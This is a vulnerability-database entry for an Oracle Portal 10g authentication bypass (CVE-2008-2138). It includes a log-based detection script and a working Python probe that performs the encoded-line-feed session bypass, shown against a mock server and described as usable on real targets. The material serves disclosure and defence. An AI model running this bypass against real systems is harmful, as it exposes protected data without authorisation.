CVE-2008-2138
Published 2008-05-12
Priority: P3 (36) · CVSS 2.0: 5.0 (medium) · Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Exploit: public
EPSS: 15.51% (96.4th percentile)
Oracle Application Server (OracleAS) Portal 10g allows remote attackers to bypass intended access restrictions and read the contents of /dav_portal/portal/ by sending a request containing a trailing "%0A" (encoded line feed), then using the session ID that is generated from that request. NOTE: as of 20080512, Oracle has not commented on the accuracy of this report.
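The description gives a two-step pattern that is easy to spot in web-server access logs: a request whose path ends in an encoded line feed, followed shortly by a successful read of /dav_portal/ from the same client. The following is an added example, not part of the original advisory or any Oracle product, that runs that correlation over constructed combined-format log lines. The log lines, the ten-minute window and the IP-based correlation are assumptions of this example.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache/OHS combined-log shape; only the fields the rule needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic): the first client performs the
# two-step bypass, the second is a legitimate user refused by DAV, the third
# only sends the probe request.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2008:10:00:01 +0000] "GET /portal/%0A HTTP/1.1" 302 -',
    '203.0.113.7 - - [12/May/2008:10:00:02 +0000] "GET /dav_portal/portal/ HTTP/1.1" 200 4127',
    '198.51.100.4 - - [12/May/2008:10:05:00 +0000] "GET /portal/page/portal/TOPLEVELSITE HTTP/1.1" 200 8812',
    '198.51.100.4 - - [12/May/2008:10:05:30 +0000] "GET /dav_portal/portal/ HTTP/1.1" 401 -',
    '192.0.2.9 - - [12/May/2008:10:09:00 +0000] "GET /portal/%0a HTTP/1.0" 302 -',
]


def parse(line):
    """Return a dict for one combined-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def has_trailing_newline(uri):
    """True when the decoded path (query string stripped) ends in LF or CR.

    Decoding first catches %0A, %0a and double-encoded variants alike.
    """
    path = unquote(uri.split("?", 1)[0])
    return path.endswith(("\n", "\r"))


def analyze(lines, window=timedelta(minutes=10)):
    """Flag probe requests and any DAV read that follows one from the same IP."""
    probes, bypasses, last_probe = [], [], {}
    for rec in filter(None, map(parse, lines)):
        if has_trailing_newline(rec["uri"]):
            probes.append((rec["ip"], rec["uri"]))
            last_probe[rec["ip"]] = rec["ts"]
        elif rec["uri"].startswith("/dav_portal/") and rec["status"] == 200:
            seen = last_probe.get(rec["ip"])
            if seen is not None and rec["ts"] - seen <= window:
                bypasses.append((rec["ip"], rec["uri"]))
    return {"probes": probes, "bypasses": bypasses}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, uri in result["probes"]:
        print(f"probe   {ip} {uri}")
    for ip, uri in result["bypasses"]:
        print(f"bypass  {ip} {uri}")
```

The correlation key is the client IP, which is the only identifier a plain access log provides. Because the bypass works by reusing the session ID, an attacker who mints the session from one address and replays it from another will show up only as a probe; correlating on the session cookie instead requires logging the Cookie header (or the server-side session store), which is the more robust rule where that data is available.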
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | application_server_portal | — | — |
No detection rules found.
Exploit-DB: Oracle Application Server Portal 10g - Authentication Bypass (CVE-2008-2138, published 2008-05-09)
---
source: https://www.securityfocus.com/bid/29119/info
Oracle Application Server Portal is prone to an authentication-bypass vulnerability because the application fails to properly restrict access to certain resources.
An attacker can exploit this vulnerability to bypass certain security restrictions and gain access to potentially sensitive contents of the portal.
Oracle Application Server Portal 10g is vulnerable to this issue; other versions may also be affected.
Requesting 'http://www.example.com/portal/%0A' (a portal URL with a trailing URL-encoded line feed) causes the server to issue a session cookie. Presenting that cookie on a request to 'http://www.example.com/dav_portal/portal/' returns the directory contents without authentication.
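The sequence above is three requests: establish that /dav_portal/portal/ refuses an anonymous client, fetch /portal/%0A to obtain a session cookie, then replay that cookie against /dav_portal/portal/. The following is an added example, not the Exploit-DB entry's code and not Oracle's, that scripts exactly that sequence and, so it runs offline, points it at a constructed mock server reproducing only the behaviour the advisory describes. The cookie name "portal_sess", the session value, the redirect and the WebDAV body are assumptions of the mock; real OracleAS uses its own cookie names.

```python
import http.client
import threading
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, HTTPServer

COOKIE_NAME = "portal_sess"         # assumed cookie name, not Oracle's
MOCK_SESSION = "0123456789ABCDEF"   # assumed session value the mock issues


class MockPortal(BaseHTTPRequestHandler):
    """Constructed stand-in that reproduces only the behaviour the CVE describes."""

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _session(self):
        jar = SimpleCookie()
        jar.load(self.headers.get("Cookie", ""))
        return jar[COOKIE_NAME].value if COOKIE_NAME in jar else None

    def do_GET(self):
        if self.path == "/portal/%0A":
            # The flaw: a path with a trailing encoded LF mints a session
            # that the DAV handler later treats as authenticated.
            self.send_response(302)
            self.send_header("Set-Cookie", f"{COOKIE_NAME}={MOCK_SESSION}; path=/")
            self.send_header("Location", "/portal/")
            self.end_headers()
        elif self.path == "/dav_portal/portal/":
            if self._session() == MOCK_SESSION:
                body = b"<D:multistatus xmlns:D='DAV:'/>"  # constructed listing
                self.send_response(200)
                self.send_header("Content-Type", "text/xml")
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)
            else:
                self.send_response(401)
                self.send_header("WWW-Authenticate", 'Basic realm="dav_portal"')
                self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()


def _get(host, port, path, session=None):
    """One GET on a fresh connection; the path is sent verbatim, %0A included."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    headers = {"Cookie": f"{COOKIE_NAME}={session}"} if session else {}
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp


def probe(host, port):
    """Run the three-step check and report what each step observed."""
    baseline = _get(host, port, "/dav_portal/portal/").status
    minted = _get(host, port, "/portal/%0A")
    jar = SimpleCookie()
    jar.load(minted.getheader("Set-Cookie") or "")
    session = jar[COOKIE_NAME].value if COOKIE_NAME in jar else None
    with_session = (
        _get(host, port, "/dav_portal/portal/", session).status if session else None
    )
    return {
        "baseline": baseline,
        "session": session,
        "with_session": with_session,
        # Only a 401 that turns into a 200 counts; a 200 on the baseline
        # means the DAV tree is simply open, which is a different finding.
        "vulnerable": baseline == 401 and with_session == 200,
    }


def run_demo():
    """Start the mock on a free loopback port, probe it, shut it down."""
    server = HTTPServer(("127.0.0.1", 0), MockPortal)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Against a real target, call probe(host, port) directly; the baseline request matters because a 200 without any cookie indicates an unprotected DAV tree rather than this bypass, and the check should report the two cases separately.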
No writeups or analysis indexed.
References
http://secunia.com/advisories/30140
http://securityreason.com/securityalert/3867
http://www.securityfocus.com/archive/1/491865/100/0/threaded
http://www.securityfocus.com/bid/29119
http://www.securitytracker.com/id?1020034
https://exchange.xforce.ibmcloud.com/vulnerabilities/42302